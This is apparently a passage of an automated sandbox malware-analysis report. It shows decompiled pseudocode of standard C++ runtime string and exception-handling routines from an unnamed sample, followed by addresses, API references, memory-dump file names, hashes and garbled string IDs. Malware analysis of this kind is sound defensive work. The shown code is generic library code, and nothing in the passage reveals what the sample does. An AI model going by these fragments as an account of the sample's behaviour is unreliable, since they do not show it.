                                                    				intOrPtr* _t48;
                                                    
                                                    				_t34 = __ebx;
                                                    				_t48 = __ecx;
                                                    				_t36 = _a4;
                                                    				_t41 =  *((intOrPtr*)(_t36 + 0x10));
                                                    				if(_t41 < __ebx) {
                                                    					_t14 = E003C2693("invalid string position");
                                                    				}
                                                    				_t42 = _t41 - _t34;
                                                    				if(_t14 < _t42) {
                                                    					_t42 = _t14;
                                                    				}
                                                    				if(_t48 != _t36) {
                                                    					if(_t42 > 0xfffffffe) {
                                                    						E003C2646("string too long");
                                                    					}
                                                    					_t15 =  *((intOrPtr*)(_t48 + 0x14));
                                                    					if(_t15 >= _t42) {
                                                    						if(_t42 != 0) {
                                                    							goto L10;
                                                    						} else {
                                                    							 *(_t48 + 0x10) = _t42;
                                                    							if(_t15 < 0x10) {
                                                    								_t23 = _t48;
                                                    								 *_t23 = 0;
                                                    								return _t23;
                                                    							} else {
                                                    								 *((char*)( *_t48)) = 0;
                                                    								return _t48;
                                                    							}
                                                    						}
                                                    					} else {
                                                    						E003C1690(_t48, _t42,  *(_t48 + 0x10));
                                                    						_t36 = _a4;
                                                    						if(_t42 == 0) {
                                                    							L22:
                                                    							return _t48;
                                                    						} else {
                                                    							L10:
                                                    							if( *((intOrPtr*)(_t36 + 0x14)) >= 0x10) {
                                                    								_t36 =  *_t36;
                                                    							}
                                                    							if( *((intOrPtr*)(_t48 + 0x14)) < 0x10) {
                                                    								_t17 = _t48;
                                                    							} else {
                                                    								_t17 =  *_t48;
                                                    							}
                                                    							E003C53B0(_t17, _t36 + _t34, _t42);
                                                    							 *(_t48 + 0x10) = _t42;
                                                    							if( *((intOrPtr*)(_t48 + 0x14)) < 0x10) {
                                                    								 *((char*)(_t48 + _t42)) = 0;
                                                    								goto L22;
                                                    							} else {
                                                    								 *((char*)( *_t48 + _t42)) = 0;
                                                    								return _t48;
                                                    							}
                                                    						}
                                                    					}
                                                    				} else {
                                                    					E003C1620(_t14 | 0xffffffff, _t42 + _t34, _t48);
                                                    					E003C1620(_t34, 0, _t48);
                                                    					return _t48;
                                                    				}
                                                    			}

                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 003C1506
                                                      • Part of subcall function 003C2693: std::exception::exception.LIBCMT ref: 003C26A8
                                                      • Part of subcall function 003C2693: __CxxThrowException@8.LIBCMT ref: 003C26BD
                                                      • Part of subcall function 003C2693: std::exception::exception.LIBCMT ref: 003C26CE
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 003C153D
                                                      • Part of subcall function 003C2646: std::exception::exception.LIBCMT ref: 003C265B
                                                      • Part of subcall function 003C2646: __CxxThrowException@8.LIBCMT ref: 003C2670
                                                      • Part of subcall function 003C2646: std::exception::exception.LIBCMT ref: 003C2681
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                    • String ID: invalid string position$string too long
                                                    • API String ID: 1823113695-4289949731
                                                    • Opcode ID: 5696d867d1d79e852e5fc0cdb48740383dbc08cfedb9812e2f2dbe87d4e10a6f
                                                    • Instruction ID: addbd049aac94d234c48bff678b0a40e9f04bed44282a4424ecd617a5a14ab7d
                                                    • Opcode Fuzzy Hash: 5696d867d1d79e852e5fc0cdb48740383dbc08cfedb9812e2f2dbe87d4e10a6f
                                                    • Instruction Fuzzy Hash: DE2191723006508BC722DA6CE840F6AF7A99BE37A1F25093EF152CB682D771DC5193A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E003C2530(void* __eax, intOrPtr* __edi, intOrPtr* _a4, signed int _a8) {
                                                    				void* __esi;
                                                    				intOrPtr _t17;
                                                    				void* _t18;
                                                    				intOrPtr _t19;
                                                    				intOrPtr* _t24;
                                                    				void* _t29;
                                                    				signed int _t30;
                                                    				intOrPtr* _t33;
                                                    				intOrPtr* _t37;
                                                    				intOrPtr _t39;
                                                    
                                                    				_t37 = __edi;
                                                    				_t30 = _a8;
                                                    				_t29 = __eax;
                                                    				_t17 =  *((intOrPtr*)(_a4 + 0x10));
                                                    				if(_t17 < _t30) {
                                                    					_t17 = E003C2693("invalid string position");
                                                    				}
                                                    				_t18 = _t17 - _t30;
                                                    				if(_t18 < _t29) {
                                                    					_t29 = _t18;
                                                    				}
                                                    				_t19 =  *((intOrPtr*)(_t37 + 0x10));
                                                    				if((_t30 | 0xffffffff) - _t19 <= _t29) {
                                                    					_t19 = E003C2646("string too long");
                                                    				}
                                                    				if(_t29 == 0) {
                                                    					L17:
                                                    					return _t37;
                                                    				} else {
                                                    					_t39 = _t19 + _t29;
                                                    					if(E003C15D0(_t39) == 0) {
                                                    						L16:
                                                    						goto L17;
                                                    					} else {
                                                    						_t33 = _a4;
                                                    						if( *((intOrPtr*)(_t33 + 0x14)) >= 0x10) {
                                                    							_t33 =  *_t33;
                                                    						}
                                                    						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
                                                    							_t24 = _t37;
                                                    						} else {
                                                    							_t24 =  *_t37;
                                                    						}
                                                    						E003C53B0( *((intOrPtr*)(_t37 + 0x10)) + _t24, _t33 + _a8, _t29);
                                                    						 *((intOrPtr*)(_t37 + 0x10)) = _t39;
                                                    						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
                                                    							 *((char*)(_t37 + _t39)) = 0;
                                                    							goto L16;
                                                    						} else {
                                                    							 *((char*)( *_t37 + _t39)) = 0;
                                                    							return _t37;
                                                    						}
                                                    					}
                                                    				}
                                                    			}

                                                    0x003c2530
                                                    0x003c2533
                                                    0x003c2537
                                                    0x003c253c
                                                    0x003c2541
                                                    0x003c2548
                                                    0x003c2548
                                                    0x003c254d
                                                    0x003c2551
                                                    0x003c2553
                                                    0x003c2553
                                                    0x003c2555
                                                    0x003c255f
                                                    0x003c2566
                                                    0x003c2566
                                                    0x003c256d
                                                    0x003c25c9
                                                    0x003c25cd
                                                    0x003c256f
                                                    0x003c2570
                                                    0x003c257c
                                                    0x003c25c8
                                                    0x00000000
                                                    0x003c257e
                                                    0x003c257e
                                                    0x003c2589
                                                    0x003c258b
                                                    0x003c258b
                                                    0x003c2590
                                                    0x003c2596
                                                    0x003c2592
                                                    0x003c2592
                                                    0x003c2592
                                                    0x003c25a3
                                                    0x003c25af
                                                    0x003c25b2
                                                    0x003c25c4
                                                    0x00000000
                                                    0x003c25b4
                                                    0x003c25b6
                                                    0x003c25bf
                                                    0x003c25bf
                                                    0x003c25b2
                                                    0x003c257c

                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 003C2548
                                                      • Part of subcall function 003C2693: std::exception::exception.LIBCMT ref: 003C26A8
                                                      • Part of subcall function 003C2693: __CxxThrowException@8.LIBCMT ref: 003C26BD
                                                      • Part of subcall function 003C2693: std::exception::exception.LIBCMT ref: 003C26CE
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 003C2566
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                    • String ID: invalid string position$string too long
                                                    • API String ID: 963545896-4289949731
                                                    • Opcode ID: 309a898ff658ab926207cdb5784128560c426dba34079e2cad682d94684a1d1a
                                                    • Instruction ID: d0093f2997ea3e124455596b9e2d49b919441ea947843e93f40e49e7db5260b7
                                                    • Opcode Fuzzy Hash: 309a898ff658ab926207cdb5784128560c426dba34079e2cad682d94684a1d1a
                                                    • Instruction Fuzzy Hash: 11119D313002019BCB06EE6CD8A0F6BF3A9BB5A310F14052DF512CB281E760ED94C7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E003C1620(void* __eax, void* __ecx, intOrPtr* __esi) {
                                                    				intOrPtr _t9;
                                                    				void* _t10;
                                                    				intOrPtr _t15;
                                                    				intOrPtr* _t18;
                                                    				void* _t22;
                                                    				intOrPtr _t25;
                                                    				intOrPtr* _t26;
                                                    				void* _t28;
                                                    				intOrPtr* _t29;
                                                    
                                                    				_t29 = __esi;
                                                    				_t22 = __ecx;
                                                    				_t28 = __eax;
                                                    				_t9 =  *((intOrPtr*)(__esi + 0x10));
                                                    				if(_t9 < __ecx) {
                                                    					_t9 = E003C2693("invalid string position");
                                                    				}
                                                    				_t10 = _t9 - _t22;
                                                    				if(_t10 < _t28) {
                                                    					_t28 = _t10;
                                                    				}
                                                    				if(_t28 == 0) {
                                                    					L14:
                                                    					return _t29;
                                                    				} else {
                                                    					_t25 =  *((intOrPtr*)(_t29 + 0x14));
                                                    					if(_t25 < 0x10) {
                                                    						_t18 = _t29;
                                                    					} else {
                                                    						_t18 =  *_t29;
                                                    					}
                                                    					if(_t25 < 0x10) {
                                                    						_t26 = _t29;
                                                    					} else {
                                                    						_t26 =  *_t29;
                                                    					}
                                                    					E003C2850(_t26 + _t22, _t18 + _t22 + _t28, _t10 - _t28);
                                                    					_t15 =  *((intOrPtr*)(_t29 + 0x10)) - _t28;
                                                    					 *((intOrPtr*)(_t29 + 0x10)) = _t15;
                                                    					if( *((intOrPtr*)(_t29 + 0x14)) < 0x10) {
                                                    						 *((char*)(_t29 + _t15)) = 0;
                                                    						goto L14;
                                                    					} else {
                                                    						 *((char*)( *_t29 + _t15)) = 0;
                                                    						return _t29;
                                                    					}
                                                    				}
                                                    			}

                                                    0x003c1620
                                                    0x003c1620
                                                    0x003c1621
                                                    0x003c1623
                                                    0x003c1628
                                                    0x003c162f
                                                    0x003c162f
                                                    0x003c1634
                                                    0x003c1638
                                                    0x003c163a
                                                    0x003c163a
                                                    0x003c163e
                                                    0x003c168c
                                                    0x003c168f
                                                    0x003c1640
                                                    0x003c1640
                                                    0x003c1647
                                                    0x003c164d
                                                    0x003c1649
                                                    0x003c1649
                                                    0x003c1649
                                                    0x003c1652
                                                    0x003c1658
                                                    0x003c1654
                                                    0x003c1654
                                                    0x003c1654
                                                    0x003c1665
                                                    0x003c1670
                                                    0x003c1676
                                                    0x003c167a
                                                    0x003c1688
                                                    0x00000000
                                                    0x003c167c
                                                    0x003c167e
                                                    0x003c1685
                                                    0x003c1685
                                                    0x003c167a

                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 003C162F
                                                      • Part of subcall function 003C2693: std::exception::exception.LIBCMT ref: 003C26A8
                                                      • Part of subcall function 003C2693: __CxxThrowException@8.LIBCMT ref: 003C26BD
                                                      • Part of subcall function 003C2693: std::exception::exception.LIBCMT ref: 003C26CE
                                                    • _memmove.LIBCMT ref: 003C1665
                                                    Strings
                                                    • invalid string position, xrefs: 003C162A
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                    • String ID: invalid string position
                                                    • API String ID: 1785806476-1799206989
                                                    • Opcode ID: df95fb8069069136c6695de64e7056b1710d52f3fc304c7420303322c9b73b4a
                                                    • Instruction ID: 9f45270dcc47a5782154065f30c1545a19d21552cc29eddaf2c45e5a3f4d6488
                                                    • Opcode Fuzzy Hash: df95fb8069069136c6695de64e7056b1710d52f3fc304c7420303322c9b73b4a
                                                    • Instruction Fuzzy Hash: BF0167313106004BD727996CDC90F1BB2E69BD670476D492CD491CBB4AD7B1DC525794
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 86%
                                                    			E003C7C25(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                                                    				intOrPtr _t17;
                                                    				intOrPtr* _t28;
                                                    				void* _t29;
                                                    				intOrPtr _t37;
                                                    				intOrPtr _t38;
                                                    
                                                    				_t28 = __esi;
                                                    				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                                                    				E003C770A(__ebx, __edx, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
                                                    				 *((intOrPtr*)(E003C3F5E(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                                                    				_t17 = E003C3F5E(__ebx, __edx, __edi, __eflags);
                                                    				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                                                    				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                                                    					_t17 =  *((intOrPtr*)(__esi + 0x14));
                                                    					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                                                    						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
                                                    							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
                                                    							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                                                    								_t17 = E003C76E3(_t37,  *((intOrPtr*)(_t28 + 0x18)));
                                                    								_t38 = _t17;
                                                    								if(_t17 != 0) {
                                                    									_push( *((intOrPtr*)(_t29 + 0x10)));
                                                    									_push(_t28);
                                                    									return E003C79BD(_t38);
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t17;
                                                    			}

                                                    0x003c7c25
                                                    0x003c7c28
                                                    0x003c7c2e
                                                    0x003c7c3c
                                                    0x003c7c42
                                                    0x003c7c4a
                                                    0x003c7c56
                                                    0x003c7c5e
                                                    0x003c7c66
                                                    0x003c7c7a
                                                    0x003c7c7c
                                                    0x003c7c80
                                                    0x003c7c85
                                                    0x003c7c8b
                                                    0x003c7c8d
                                                    0x003c7c8f
                                                    0x003c7c92
                                                    0x00000000
                                                    0x003c7c99
                                                    0x003c7c8d
                                                    0x003c7c80
                                                    0x003c7c7a
                                                    0x003c7c66
                                                    0x003c7c9a

                                                    APIs
                                                      • Part of subcall function 003C770A: __getptd.LIBCMT ref: 003C7710
                                                      • Part of subcall function 003C770A: __getptd.LIBCMT ref: 003C7720
                                                    • __getptd.LIBCMT ref: 003C7C34
                                                      • Part of subcall function 003C3F5E: __getptd_noexit.LIBCMT ref: 003C3F61
                                                      • Part of subcall function 003C3F5E: __amsg_exit.LIBCMT ref: 003C3F6E
                                                    • __getptd.LIBCMT ref: 003C7C42
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.330399908.00000000003C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000006.00000002.330385524.00000000003C0000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330534847.00000000003CD000.00000004.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_3c0000_UNK_.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                                    • String ID: csm
                                                    • API String ID: 803148776-1018135373
                                                    • Opcode ID: 9f9b1aa9a7291755015e8beb81bd7059a7d13f40e4deb95a1576ac4f54237fda
                                                    • Instruction ID: 1c8d6fee6a95e4a7dff1bbe455c98d42ee7c03fdf5e1f07e90e073e03889a550
                                                    • Opcode Fuzzy Hash: 9f9b1aa9a7291755015e8beb81bd7059a7d13f40e4deb95a1576ac4f54237fda
                                                    • Instruction Fuzzy Hash: 4E014B74808306CACF36AF25C444FACB3B5BF10311F15882EE845DA251DB318D90CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (m$,$d Dl$d Dl$d+Hl$#}k^
                                                    • API String ID: 0-3745195359
                                                    • Opcode ID: 377add88d1dc2bbd10997cf1466f756c1439e0077996bc7b21c7fdef36df3f39
                                                    • Instruction ID: 37e33174c02027846c6c1366715babd21912f97b914232b42cc15b520c5c1392
                                                    • Opcode Fuzzy Hash: 377add88d1dc2bbd10997cf1466f756c1439e0077996bc7b21c7fdef36df3f39
                                                    • Instruction Fuzzy Hash: C502CB70B002049FDB24EFA8D454BAAB7A7EF85318F118928D5169F3A4CF74EC85CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,$d Dl$d Dl$d+Hl$#}k^
                                                    • API String ID: 0-3257364843
                                                    • Opcode ID: 31d35e2f4d3209fc66749e1e971cdbfb850dbea0ca747fe669418867ae9c2116
                                                    • Instruction ID: f51c051a6fd5305c3907a7e6cfa7ae09d817abe5430d81958972433ae0eaedd1
                                                    • Opcode Fuzzy Hash: 31d35e2f4d3209fc66749e1e971cdbfb850dbea0ca747fe669418867ae9c2116
                                                    • Instruction Fuzzy Hash: F6D1B970B002009FDB24EBA8D454BAAB7E7AF85318F25896CD5169F3A1DF74DC45CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: d Dl$d Dl$d+Hl$#}k^
                                                    • API String ID: 0-2348408925
                                                    • Opcode ID: 802dc699c086f41ec3b66e1d098e631502d27425733d75dffeef0ed4f6c11669
                                                    • Instruction ID: 25ffd9e578cb04e998755c96deb62c1caf92af22e2309bfbb44b2bd5e6c7f011
                                                    • Opcode Fuzzy Hash: 802dc699c086f41ec3b66e1d098e631502d27425733d75dffeef0ed4f6c11669
                                                    • Instruction Fuzzy Hash: 77619A707002009FDB24EFA8D454BAAB7EBEB85318F11896CD5169F3A1DF74EC458B81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TSHl$TSHl
                                                    • API String ID: 0-2025614696
                                                    • Opcode ID: e276b150e8f083ab6c3f8d2f0c05b422e3f2f7537420cc4172a021ab9c84669b
                                                    • Instruction ID: a5c699c793919da4378873156917eb7dcf8209a0275e215e5e7b4b0142f68cfd
                                                    • Opcode Fuzzy Hash: e276b150e8f083ab6c3f8d2f0c05b422e3f2f7537420cc4172a021ab9c84669b
                                                    • Instruction Fuzzy Hash: BA11ADB4B00208CFCB54EBB9D8559AEB7FAEF89648B054478C50ADB350EB35DC45CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: TSHl
                                                    • API String ID: 0-2004172670
                                                    • Opcode ID: 54611d85e8bb701fca52a918966b80d7e5038e0e826ae52d4efcb16082808358
                                                    • Instruction ID: ee87f1c5e4f6be85ebca82106994ebeebc1dbcdc7016b17fd8ba043e6368809b
                                                    • Opcode Fuzzy Hash: 54611d85e8bb701fca52a918966b80d7e5038e0e826ae52d4efcb16082808358
                                                    • Instruction Fuzzy Hash: 1E118CB4A00204CFCB54DBB9D8959AAB7F6FF89348B0548A9C51ADB320EB35DD45CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7baddbc0d9a8e60f08372b8fc0406ce4af0d9d3e7dc7bca58d7bde4639425b44
                                                    • Instruction ID: 0a8dbf21e44114a46f1f58eea1ba4d27957caa7be3be3ca7cc4b4715a38b5d4f
                                                    • Opcode Fuzzy Hash: 7baddbc0d9a8e60f08372b8fc0406ce4af0d9d3e7dc7bca58d7bde4639425b44
                                                    • Instruction Fuzzy Hash: 6B01D2B4A063588FCF16DB69D8607AB3BBAAF06344F0A009DC909D7742C7349900CF92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dd65fe21259b0346d1cb74f460d4beae790454ae257a1b267741eea9c371f27f
                                                    • Instruction ID: c343e5de99ddae0d7c04742025827456e7cf4d0fadaf1ed4f731ac59890c196b
                                                    • Opcode Fuzzy Hash: dd65fe21259b0346d1cb74f460d4beae790454ae257a1b267741eea9c371f27f
                                                    • Instruction Fuzzy Hash: 5191D370B002089FCB15DBB8D454AAEBBF6AF89744F1485AAD406DB761CF74DC06CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0cc8dac770063b81e8e78b78f37ea26d192737fd6b20f01ef50dd589c31e461c
                                                    • Instruction ID: 6e272e0082983127d3b499a6d48183133ac2aff4ac26a2333acfac1d1e12fd74
                                                    • Opcode Fuzzy Hash: 0cc8dac770063b81e8e78b78f37ea26d192737fd6b20f01ef50dd589c31e461c
                                                    • Instruction Fuzzy Hash: 7541BF70B042049FDB15DB68D464BAEBBF6EF89248F1484A9D106DB3A1CB75DC09CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3b659454fb86d7bddca51c46103b2277eb2ddea4a71e147ce9ff15b323da0a85
                                                    • Instruction ID: 55a7388e30feff85cab78dd6898bf6017ec7c7fbaf50ef8847d2828a03fedb15
                                                    • Opcode Fuzzy Hash: 3b659454fb86d7bddca51c46103b2277eb2ddea4a71e147ce9ff15b323da0a85
                                                    • Instruction Fuzzy Hash: A451C630601319CFCB65EF75E1488997767FB863097508969D812CB278EB39ED86CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 070cc68e9f950c0ca5d5834be4407ed48e8b0442bc79f20b8dbb180bc3add99a
                                                    • Instruction ID: 72e9b7ae4072a48f1afc46bcc4b46950a400dc4c6d469488f3a0d2d31ce2251f
                                                    • Opcode Fuzzy Hash: 070cc68e9f950c0ca5d5834be4407ed48e8b0442bc79f20b8dbb180bc3add99a
                                                    • Instruction Fuzzy Hash: 8E51B530601319CFCB65EF79E1488997767FB863097508929D812CB278EB39ED86CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7b91c79e16204e00a0c88a735e56ae307a44d95c7b70af39e57be2481d751729
                                                    • Instruction ID: 0a3f8813bfd76402073fee295eab9a1a34cd4ea6a447447a63b6f52985b2aa54
                                                    • Opcode Fuzzy Hash: 7b91c79e16204e00a0c88a735e56ae307a44d95c7b70af39e57be2481d751729
                                                    • Instruction Fuzzy Hash: 6A417C70B101149FD714DB68D498A5EBBF6AF89714F1580A9E806DB3B1CF71EC01CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 66270a0f81291d1581a94134e64a11b1928bffa7bda9a33092f5cf8145e744ee
                                                    • Instruction ID: caf5344ffc4155d62636defabb04d7adab1f7811854f4456638ec0a6bf1fbeb4
                                                    • Opcode Fuzzy Hash: 66270a0f81291d1581a94134e64a11b1928bffa7bda9a33092f5cf8145e744ee
                                                    • Instruction Fuzzy Hash: E331B071A002089FDB15DF68C464B9EBBF6BF89304F1484ADD501AB771CB759C45CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2fa0000_SYSTEM32.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dcf64448ebc35cbe75c9d93365638388ae8f76179e6a1746c1e5517169ae541b
                                                    • Instruction ID: 1653e39ac5c92ae5a4272f5d29469a38ddf26f7fba22fb3927082471a3f9fc7f
                                                    • Opcode Fuzzy Hash: dcf64448ebc35cbe75c9d93365638388ae8f76179e6a1746c1e5517169ae541b
                                                    • Instruction Fuzzy Hash: 9E31CE70F012159FCB44EB789851AAE7BF6EF89208B1400BDE145DB361EF34DC058B92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.559915428.0000000002FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
